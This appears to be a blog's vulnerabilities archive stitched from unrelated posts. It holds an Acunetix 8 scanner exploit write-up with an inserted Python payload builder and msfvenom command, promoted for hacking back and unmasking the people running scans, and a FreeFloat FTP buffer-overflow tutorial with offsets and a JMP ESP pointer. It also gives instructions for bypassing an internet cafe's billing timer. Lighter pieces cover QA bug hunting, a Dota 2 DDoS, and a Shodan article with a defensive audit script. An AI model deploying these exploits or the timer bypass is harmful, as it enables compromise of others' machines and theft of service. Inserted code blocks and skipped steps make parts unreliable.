Category Archives: Vulnerabilities

That article revealed a new vulnerability that gave attackers the ability to perform a spoofing attack.

Many people wrote to me about the problems with that kind of article (for example).

So this time I'm going to reveal a new 0-day that will help security managers protect their web sites against many vulnerability scans.

A lot of site owners will tell you that the majority of the scans performed against their sites are run by automatic tools like NESSUS, ACUNETIX and APPSCAN.

Today's 0-day is focused on one of the most popular web scanners in the world, ACUNETIX.

The PoC is against ACUNETIX 8 (build 20120704, since it is one of the most common cracked versions published on the net and used by many newbie hackers).

This disclosure not only reveals a new vulnerability, but demonstrates a whole new way of dealing with external attacks.

Instead of protecting your web sites again and again, or buying a new advanced WAF (web application firewall), let's give the attackers a reason to be afraid, a reason to think twice before they press the "SCAN" button.

In this article, I will not give a full working exploit for all scan scenarios or for all operating systems, but a proof of concept that will hopefully grow into a new research effort into vulnerabilities in penetration-testing tools.

So let's get our hands dirty.

ACUNETIX is a powerful tool for scanning websites and finding vulnerabilities in them.

Many newbie attackers tend to use this tool because it is so simple to use.

ACUNETIX offers its users a simple wizard-based scan that covers many aspects of a vulnerability scan.

One of these aspects is the ability to scan further domains or subdomains related to the scanned website.

For example, if we scan my blog “http://an7isec.blogspot.co.il”, we get the result shown below:

After a little research into this option, I figured out that ACUNETIX starts its wizard by sending an HTTP request to the site and learning about it from the HTTP response.

Furthermore, the wizard learns about the related external domains from the external resources that appear on the website, for example:

“<img src=http://externalSource.com/someimg.png >”

“<a href=http://externalSource.com/ ></a>”

Etc…

Further analysis reveals that if one of the external domain names is longer than 268 bytes, ACUNETIX crashes. So if we want to cause a crash, all we need to do is put some kind of external resource on our site whose host name is 268 bytes or more, say something like this:

<A href="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

A quick look at the application in Immunity Debugger reveals that EDX was corrupted by the fuzzing string, which caused an access violation:

Despite the fact that the overflow also runs over the Structured Exception Handler (SEH), as you will probably notice, my advice is not to go that way; believe me, I tried it for several days with no success (because of the SafeSEH mechanism).

However, we have another problem with this exploit. In one word: "ASCII".

ACUNETIX gets its information about external domains as a URL.

This means the string is normalised into a web-browser-friendly form (printable, URL-safe characters) before it reaches the vulnerable code, so every byte we want to land in memory, the addresses included, has to be a printable character. Two values that satisfy this constraint were chosen:

500f = 0x66303035: a readable memory location, used to repair the register corrupted by the overflow so the application keeps running until it reaches our return address.

]Qy~ = 0x7e79515d: JMP ESP from SXS.DLL.

OK, right now we are at the semi-final stage: running the application against the above payload produced the following result:

Yes… we landed exactly at the beginning of the final payload.

The next step is to use a suitable Windows shellcode made only of characters that survive as a URL string (limited ASCII).

Such shellcode can be generated with Metasploit; it is called "alphanumeric shellcode".

The important thing to remember when using such a payload is that the address where the payload starts must be present in one of the registers at the moment it runs, because the decoder stub uses that register to find itself. If the payload sits at ESP, the first opcode of the shellcode needs to be PUSH ESP (0x54, which is the printable letter 'T').
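To make the byte constraints concrete, here is an added example (my code, not the author's exploit) that packs the two values quoted above as little-endian DWORDs, checks that every byte of a candidate payload is printable ASCII that can survive the scanner's URL handling, checks that alphanumeric shellcode meant for ESP starts with PUSH ESP (0x54, the letter 'T'), and assembles the long href. The padding lengths are placeholders marked ASSUMED: the post only says the host name must exceed 268 bytes, and the real offsets come from the debugger. Also assumed is which delimiter characters the scanner leaves untouched; confirm that with a test scan (the post's own "]Qy~" shows ']' and '~' survived).

```python
"""Build the crash trigger for the ACUNETIX external-link overflow and verify
the byte constraints the post describes. Hypothetical example code, not the
author's exploit; the offsets marked ASSUMED are placeholders."""
import struct

# Values quoted in the post: little-endian DWORDs that spell printable text.
FIXUP_ADDR = 0x66303035     # "500f": readable memory used to repair the clobbered register
JMP_ESP_ADDR = 0x7e79515d   # "]Qy~": JMP ESP in SXS.DLL (per the post; Windows XP specific)

# ASSUMED layout. The post only says the name must exceed 268 bytes; the exact
# distance to the corrupted register and to the return slot comes from the debugger.
PAD_TO_FIXUP = 268
PAD_BETWEEN = 4


def le_dword(addr: int) -> bytes:
    """Pack a 32-bit address little-endian, the way it must sit in the buffer."""
    return struct.pack("<I", addr)


def ascii_ok(data: bytes) -> bool:
    """True if every byte is printable ASCII (0x21-0x7e). Anything else is
    percent-encoded or dropped when the scanner normalises the URL, so it can
    never reach memory as-is. Which delimiters survive must be tested; the
    post's ']Qy~' shows ']' and '~' did."""
    return all(0x21 <= b <= 0x7e for b in data)


def shellcode_ok(sc: bytes) -> bool:
    """Alphanumeric shellcode (x86/alpha_mixed, BufferRegister=ESP) is itself
    printable and, because the decoder locates itself through ESP, begins with
    PUSH ESP, whose single-byte opcode 0x54 is the letter 'T'."""
    return ascii_ok(sc) and sc[:1] == b"T"


def build_href(shellcode: bytes) -> bytes:
    """Host name = padding | fix-up value | padding | JMP ESP | shellcode."""
    buf = (b"A" * PAD_TO_FIXUP + le_dword(FIXUP_ADDR)
           + b"B" * PAD_BETWEEN + le_dword(JMP_ESP_ADDR) + shellcode)
    if not ascii_ok(buf):
        raise ValueError("payload contains bytes that will not survive URL handling")
    return buf


def build_page(shellcode: bytes) -> str:
    """Wrap the host name in the kind of external link the scan wizard follows."""
    host = build_href(shellcode).decode("ascii")
    return f'<html><body><a href="http://{host}/">x</a></body></html>'


def crash_only_page(length: int = 300) -> str:
    """Denial-of-service variant: any external host name over 268 bytes."""
    return f'<a href="http://{"A" * length}/"></a>'


if __name__ == "__main__":
    print(crash_only_page())
    print(build_page(b"TYIIIIIIIIIIIIIIII"))   # placeholder, not a real payload
```

Generating the calc payload in the form the post describes is a standard Metasploit invocation, `msfvenom -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f python`; the output fed to build_page() must pass shellcode_ok(), otherwise the decoder will not find itself when execution lands at ESP.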

In my proof of concept, I used a simple "CALC.EXE" shellcode generated by Metasploit, which led me to the final stage: a working exploit!!

Moreover, this exploit does not need to bypass DEP at all. On Windows XP, DEP runs in OptIn mode by default, so it only covers system binaries and executables that opt in (for example by being linked with /NXCOMPAT); every other process gets an executable stack.

And since ACUNETIX itself is not opted in to DEP, the JMP ESP landing works and this exploit should run perfectly on Windows XP. On a machine where DEP is set to OptOut or AlwaysOn, jumping straight to ESP will fault and a ROP chain would be needed instead.

After successfully reaching all our goals, let's look at the final working exploit:

Following all the above, we have created a powerful exploit that newbie hackers will definitely fall for.

This exploit gives us the ability to deal with all those nasty newbie hackers who scan our sites day and night, killing our traffic, filling all the web site forms with junk, and so on…

Furthermore, it can be used to collect intelligence about hostile parties who want to attack our web application.

BUT!!

The more powerful idea that motivated me to reveal this concept and PoC is the fact that this exploit is an anonymity killer! Even if the attacker uses the smartest and most secure proxy in the world, such as TOR, the payload runs on the scanning machine itself, so any connection it makes back to us comes from that machine's real network address rather than from the proxy, and full control of the scanning machine is gained. (The only exception is a machine whose entire network stack is forced through the proxy; a scanner run from an ordinary desktop with TOR configured only inside the scan tool is not.)

The exploit can be downloaded from here.

Saved Return Pointer Overflows

For our first buffer overflow exploit we will start with the most straightforward scenario: a clean EIP overwrite where one of the CPU registers points directly at a large portion of our buffer. For this part we will create an exploit from scratch for "FreeFloat FTP". You can find a list of several exploits that were created for "FreeFloat FTP" here.

Normally we would need to do bad-character analysis, but for our first tutorial we will rely on the bad characters listed in the pre-existing Metasploit modules on exploit-db. The characters listed are "\x00\x0A\x0D". We need to keep these characters in mind for later.

Replicating The Crash

First of all we need to create a POC skeleton exploit that crashes the FTP server. Once we have that we can build on it to create our exploit. You can see my POC below; I have based it on the exploits for "FreeFloat FTP" that I found on exploit-db. We will be using the pre-existing "anonymous" user account, which comes configured with the FTP server (the exploit should work with any valid login credentials).

OK, so far so good: when we attach the debugger to the FTP server and send our POC buffer, the program crashes. In the screenshot below you can see that EIP is overwritten and that two registers (ESP and EDI) contain part of our buffer. After analyzing both register dumps, ESP seems more promising since it contains a larger chunk of our buffer (I should mention, however, that creating an exploit starting from EDI is certainly possible).

Registers

Overwriting EIP

Next we need to analyze our crash. To do that we replace our A's with the Metasploit pattern and resend our buffer. Pay attention that you keep the original buffer length, since a varying buffer length may change the way the program crashes.

When the program crashes again we see the same thing as in the screenshot above, except that EIP (and both registers) is now overwritten by part of the Metasploit pattern. Time to let "mona" do some of the heavy lifting. If we issue the following command in Immunity Debugger, "mona" analyzes the program crash for us:

!mona findmsp

You can see the result of that analysis in the screenshot below.

Metasploit Pattern

From the analysis we can see that EIP is overwritten by the 4 bytes that directly follow the initial 247 bytes of our buffer. As I said before, ESP contains a larger chunk of our buffer, so it is the more suitable candidate for our exploit. Using this information we can reorganize the evil buffer in our POC above to look like this:

evil = "A"*247 + "B"*4 + "C"*749

When we resend our modified buffer we can see that it works exactly as we expected: EIP is overwritten by our four B's.

EIP = 42424242

That means we can replace those B's with a pointer that redirects execution flow to ESP. The only thing we need to keep in mind is that our pointer can't contain any bad characters. To find such a pointer we can use "mona" with the following command; you can see the results in the screenshot below.

!mona jmp -r esp

Pointers to ESP

It seems that any of these pointers will do. They belong to OS DLLs, so they are specific to "WinXP PRO SP3", but that isn't our primary concern. We can just use the first pointer in the list. Keep in mind that we need to reverse the byte order, because the CPU is little-endian. Observe the syntax below.

Pointer: 0x77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5701 (C:\WINDOWS\system32\msvcrt.dll)

Buffer: evil = "A"*247 + "\x59\x54\xC3\x77" + "C"*749

I should stress that it is important to document your exploit properly, for your own and others' edification. Our final-stage POC should look like this.

OK, let's restart the program in the debugger and put a breakpoint on our pointer so the debugger pauses if it reaches it. As we can see in the screenshot below, EIP is overwritten by our pointer and we hit our breakpoint, which should bring us to our buffer located at ESP.

Breakpoint

Shellcode + Game Over

We are almost done. We need to (1) modify our POC a bit to add a variable for our shellcode and (2) insert a payload of our liking. Let's start with the POC: we will insert our payload in the part of the buffer that is currently made up of C's. Ideally the filler length should be calculated dynamically, so we don't need to recalculate when we insert a payload of a different size (the total buffer length should remain 1000 bytes). We should also insert some NOPs (No Operation, \x90) before our payload as padding. You can see the result below. Any shellcode that we put in the shellcode variable will be executed by our buffer overflow.

A very good and important point, right? If you are a software tester or a QA engineer then you must be thinking every minute about how to find a bug in an application. And you should be!

I think finding a blocker bug like a system crash is often rewarding! No, I don't think like that. You should try to find the bugs that are most difficult to find and that always mislead users.

Finding such subtle bugs is the most challenging work, and it gives you satisfaction in your work. It should also be rewarded by seniors. I will share my experience of one such subtle bug that was not only difficult to catch but also difficult to reproduce.

I was testing one module of my search engine project. I do most of the testing on this project manually, as it is a bit complex to automate. That module consists of traffic and revenue stats for different affiliates and advertisers, so testing such reports is always a difficult task. When I tested this report it showed the data accurately processed for some time, but when I tried to test it again after a while it showed misleading results. It was strange and confusing to see the results.

There was a cron (a cron is an automated script that runs at a specified time or on a specified condition) to process the log files and update the database. Multiple such crons run on the log files and the DB to synchronize the total data. Two crons were running on one table at different intervals, and there was a column in the table that was being overwritten by the other cron, making the data inconsistent. It took us a long time to figure out the problem because of the vast number of DB processes and different crons.

My point is: try to find the hidden bugs in the system that occur only under special conditions and have a strong impact on the system. You can find such bugs with a few tips and tricks.

So what are those tips:

1) Understand the whole application or module in depth before starting the testing.

2) Prepare good test cases before you start testing. I mean put stress on the functional test cases that cover the major risks of the application.

3) Create sufficient test data before the tests. This data set includes the test case conditions and also the database records, if you are going to test a DB-related application.

4) Perform repeated tests in different test environments.

5) Try to find the pattern in the results and then compare your results against that pattern.

6) When you think you have completed most of the test conditions and you are somewhat tired, do some monkey testing.


7) Use your previous test data patterns to analyse the current set of tests.

8) Try some standard test cases for which you found bugs in a different application. For example, if you are testing an input text box, try inserting some HTML tags as input and look at the output on the display page.

9) Last, and the best trick: try very hard to find the bug, as if you are testing only to break the application!

I spent some time in internet cafes, playing LAN games with my friends. We used to pay only a few bucks and then play for hours for free, without getting noticed, using a little trick. You don't need any software or hacking skills to do this trick; it's very simple and anyone with a bit of computer knowledge can do it. Let's start.

How to disable the timer on the computers in an Internet cafe and play with your friends as long as you want.

1. First of all, create a new text document, write CMD in it, and save it as anything.bat (make sure the file extension is .bat).

2. Now find your batch (.bat) file and run it. If you've done it correctly, CMD (Command Prompt) will open.

3. Now type cd\windows in CMD (this changes the directory to WINDOWS). Then type regedit and the Registry Editor should open.

5. Then, in the right pane, right-click the DisableTaskMgr value, choose Modify, and change its value to 0. Now open Task Manager (CTRL+ALT+DELETE or CTRL+SHIFT+ESCAPE) and end the Internet cafe's timer process. This works because the lockdown is nothing more than a per-user policy value in the registry: anyone who can reach a command prompt and write to their own HKEY_CURRENT_USER hive can switch it back off.

Hackers brought down the world championship for the mega-popular online game Dota 2, The International, which has US$18 million in prize money, through a Distributed Denial of Service (DDoS) attack. The hugely popular tournament, organised by the game's developer Valve Software, was brought to a crashing halt in the middle of the very first match of its second day.

PC World reports that just when things started to heat up in game one of the best-of-three match between Evil Geniuses and compLexity Gaming, the game was suddenly struck by lag and paused soon thereafter. The DDoS attack, which was confirmed by a Dota 2 analyst on the official The International livestream, held up the games for around an hour.

Analysts noted that since the Dota 2 matches at The International are played over the public Internet, not a local network, the tournament was exposed to an outside attack.

Though PC World has reported that The International has resumed, the livestream still shows only the tournament's wallpaper.

When gameplay was paused by the DDoS attack, the Dota 2 teams Evil Geniuses and compLexity Gaming were just starting their match.

The Shodan search engine can be used to find routers with exposed backdoors, unsecured webcams, and industrial control systems still using default passwords.

It’s the Google for the Internet of Things, a playground for hackers and terrorists — and, maybe, a useful tool for companies looking to lock down their own environment.

Shodan founder John Matherly launched the search engine more than five years ago as a market intelligence tool, designed to provide technology companies with information about where and how their products were being used.


“And of course the same type of information can be queried about competitors, to better understand how they’re positioned in the market using empirical data,” said Matherly.

Since its launch, however, the search engine has taken on a life of its own, he admits.

“It has become a tool by security experts to gain a better understanding of the Internet,” he said.

The public website is actually a small piece of what Shodan offers. Enterprise clients can buy raw, real-time access to all the data it collects.

For example, a company can use Shodan to search its own networks.

“It is very common for large companies to have a random computer laying around running Telnet or having a building automation system online that wasn’t properly configured by a contractor,” he said. “And with the advent of cloud computing, I’ve seen a big increase in the number of publicly-accessible cloud servers that don’t have any authentication enabled and therefore leak their entire contents to the Internet.”

A company can also use Shodan to check the security of companies they’re considering acquiring or doing business with.

Another use of Shodan is to find the malware command and control servers used by cybercriminals, which is normally a very time-intensive process.

“However it is very straight-forward to identify them with Shodan once a fingerprint has been established,” Matherly said.
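As an added example (my code, neither Shodan's nor the article's), here is how a company might run the self-audit and fingerprint-based searches described above against Shodan's data: build a query restricted to its own address ranges, then triage the returned banner records for the exposures Matherly lists (a stray Telnet login, a building-automation controller, a datastore answering without authentication). The banner records are constructed to resemble Shodan's banner JSON (ip_str, port, data, org) and are not real hosts; FINGERPRINTS is my own starter list, and the live_search helper only imports the official shodan client if it is installed.

```python
"""Triage Shodan banner records for the exposures the article describes.
Added example, not Shodan's own code. SAMPLE_BANNERS are CONSTRUCTED records
in the shape of Shodan's banner JSON (ip_str, port, data, org); they are not
real hosts. FINGERPRINTS is a hypothetical starter list."""


# Shodan search syntax: filters are space-separated and ANDed together;
# one filter takes several values as a comma-separated list.
def build_query(cidrs, ports=None):
    """net:<your ranges> [port:<list>]: a self-audit query scoped to what you own."""
    query = "net:" + ",".join(cidrs)
    if ports:
        query += " port:" + ",".join(str(p) for p in ports)
    return query


# (name, ports, substrings that must appear in the banner, severity)
FINGERPRINTS = [
    ("Telnet login prompt exposed", {23}, ("login:", "Password:"), "high"),
    ("BACnet building automation online", {47808}, ("Vendor Name",), "high"),
    ("Elasticsearch answering without auth", {9200}, ('"cluster_name"',), "critical"),
    ("MongoDB answering without auth", {27017}, ("MongoDB Server Information",), "critical"),
]


def triage(banners, fingerprints=FINGERPRINTS):
    """Match each banner against the fingerprint list. The same routine serves
    the C2 hunt the article mentions: add a fingerprint for the panel's banner."""
    findings = []
    for b in banners:
        data = b.get("data", "")
        for name, ports, needles, severity in fingerprints:
            if b.get("port") in ports and any(n in data for n in needles):
                findings.append({"ip": b["ip_str"], "port": b["port"],
                                 "org": b.get("org", ""), "finding": name,
                                 "severity": severity})
    return findings


# Constructed sample; 203.0.113.0/24 is a documentation range, not a real network.
SAMPLE_BANNERS = [
    {"ip_str": "203.0.113.10", "port": 23, "org": "Example Corp",
     "data": "\r\nWelcome to the branch router\r\nlogin: "},
    {"ip_str": "203.0.113.20", "port": 47808, "org": "Example Corp",
     "data": "Instance ID: 1234\nVendor Name: ExampleHVAC\nObject Name: AHU-1\n"},
    {"ip_str": "203.0.113.30", "port": 9200, "org": "Example Corp",
     "data": 'HTTP/1.1 200 OK\r\n\r\n{"name": "node-1", "cluster_name": "prod"}'},
    {"ip_str": "203.0.113.40", "port": 443, "org": "Example Corp",
     "data": 'HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm="vpn"\r\n'},
]


def live_search(api_key, query):
    """Fetch real banners with the official client (pip install shodan).
    Imported lazily so the offline triage above never needs it."""
    import shodan
    return shodan.Shodan(api_key).search(query)["matches"]


if __name__ == "__main__":
    print(build_query(["203.0.113.0/24"], [23, 47808, 9200, 27017]))
    for f in triage(SAMPLE_BANNERS):
        print(f"{f['severity']:9} {f['ip']}:{f['port']}  {f['finding']}")
```

The 401 on port 443 is deliberately left unflagged: a service that demands credentials is not the problem Matherly is describing, and a triage that flags every open port produces the kind of noise that gets these reports ignored.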

“I don’t see it as a threat,” said Leonard Jacobs, president and CEO at Minneapolis-based managed security service provider Netsecuris Inc. “For our practice, we see it as a good thing for our customers, we use it to confirm what we find through other techniques.”

In theory, a company would know about all the devices and systems it has exposed on the Internet, he said.

But sometimes, for the sake of convenience, corners are cut.

“You’ll be surprised what you’ll find out there,” he said.

A force for evil?

Shodan allows attackers to quickly identify specific devices, or specific software, on a very large scale.

“For example, every web-connected Furby could be identified quickly by going to Shodan and looking for the appropriate signature, versus the hacker having to scan the entire Internet,” said Shane MacDougall, a partner at Canadian security consultancy Tactical Intelligence Inc.

Cybercriminals, terrorists, rogue nation-states, even rival companies can use Shodan to identify critical infrastructure and cause it to malfunction, said Jean Taggart, security researcher at San Jose-based Malwarebytes Corp.

And fixing these problems isn’t always a high priority for organizations, he added.

“I worry that we won’t see movement until a serious enough event occurs,” he said. “A government-led effort to identify the owners of these devices and secure them is in high order.”

Using Shodan also means that a hacker doesn’t set off any warning bells at a targeted company.

According to Michael Baucom, vice president of R&D at Columbia, Md.-based Tangible Security, the true power of Shodan is that all the scanning has already been done — the user is simply querying the results without revealing their address or actions to the target, and with minimal effort.

“Scans of the magnitude of Shodan would take a long time and would be very noisy,” he said.

But Shodan doesn’t actually create any vulnerabilities, said Hagai Bar-El, CTO at Sansa Security, an Israel-based security firm focusing on the Internet of Things.

“It merely points them out,” he said. “Unarguably, detecting weak nodes is an important part of an attack, but hackers have been able to do this with automated crawlers, long before Shodan was developed.”

In addition, most independent security researchers agree that once a vulnerability is discovered, the public is better off if it is publicized rather than kept secret, he said.

“The public that relies on the vulnerable system has a right to be made aware of its vulnerable state,” he said. That way, they can do something about it, such as switching vendors.

“Publishing a flaw found in a commercial product is the only effective way of encouraging the vendor to actually fix it,” he added. “History is full of examples of vendors that have ignored security issues in their products for months and years until those flaws are made public.”

Meanwhile, every unfixed vulnerability is a “ticking timebomb,” he said.

But it's not just that the bad guys already have these tools available, said Shodan's Matherly. The Shodan website requires users to register for an account, and only the first set of search results is free.

There are also “numerous technical measures” to prevent abuse, Matherly added.

“In reality, it is much cheaper and effective for the bad guys to use a botnet or a compromised host running [open source network scanning tools] zmap or masscan than to search Shodan.”

The project, which results in the crystal-clear audio reception heard after the break, uses a whole list of packages on a Windows box to access the emergency bands. SDRSharp, which has been popular with other DVB dongle hacks, handles the hardware side. In this case the dongle is a Newsky TV28T v2 module that he picked up for a few bucks. He's also using some supporting programs, including Digital Speech Decoder, which turns the data into audio.

We wonder how many areas this will work for. It was our understanding that law enforcement was moving to encrypted communications systems. But all we really know about it is that you can jam the system with a children's toy.